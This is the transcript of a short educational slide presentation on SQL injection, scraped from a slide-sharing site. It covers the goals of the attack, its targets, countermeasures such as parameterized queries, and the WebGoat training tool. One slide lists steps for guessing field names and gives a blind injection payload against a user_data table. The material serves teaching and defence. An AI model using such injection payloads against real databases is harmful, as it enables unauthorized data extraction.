sql injection l.
Download
Skip this Video
Download Presentation
SQL injection

Loading in 2 Seconds...

play fullscreen
1 / 13

SQL injection - PowerPoint PPT Presentation


  • 196 Views
  • Uploaded on

SQL injection. Figure 1 By Kaveri Bhasin. Motive of SQL Injection. Obtain data from database Modify system functions Insert data in the backend database. Figure 2. Victims . Mostly Web applications with user input facilities. . Simplest Procedure. Guess field names.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'SQL injection' - zalman


Download Now An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
sql injection

SQL injection

Figure 1

By

Kaveri Bhasin

motive of sql injection
Motive of SQL Injection
  • Obtain data from database
  • Modify system functions
  • Insert data in the backend database
victims
Victims

Mostly Web applications with user input facilities.

simplest procedure
Simplest Procedure
  • Guess field names.
  • Construct a query and check for SQL status
  • If server gives error, field name is incorrect, else

lets proceed…

slide7
Cont.
  • With the correct field, construct SQL query and inject

Example:

101 AND Len(( SELECT first_name FROM user_data WHERE userid =15613)) = 6

paper overview
Paper overview
  • Types of Vulnerabilities
  • Measures
  • Tools (Webgoat)
types of vulnerabilities
Types of vulnerabilities
  • Database system vulnerability
  • Type handling
  • Injected filtered escape characters
measures
Measures
  • Web application design: Analyze against vulnerabilities
  • Use strongly defined types and validation for user input
  • Use parameterized queries
tools
Tools
  • Webgoat

Developed by OWASP.org

Free source to experiment and learnt about SQL injection

conclusion
Conclusion

SQL injection is a serious concern

A single design error can be disastrous for the security of sensitive information

references
References
  • Figure 1. http://ocliteracy.com/techtips/sql-injection.html
  • Figure 2. “Towards an Aspect-Oriented Intrusion Detection Framework”
  • Zhi Jian Zhu and Mohammad Zulkernine
  • http://www.owasp.org/
  • http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf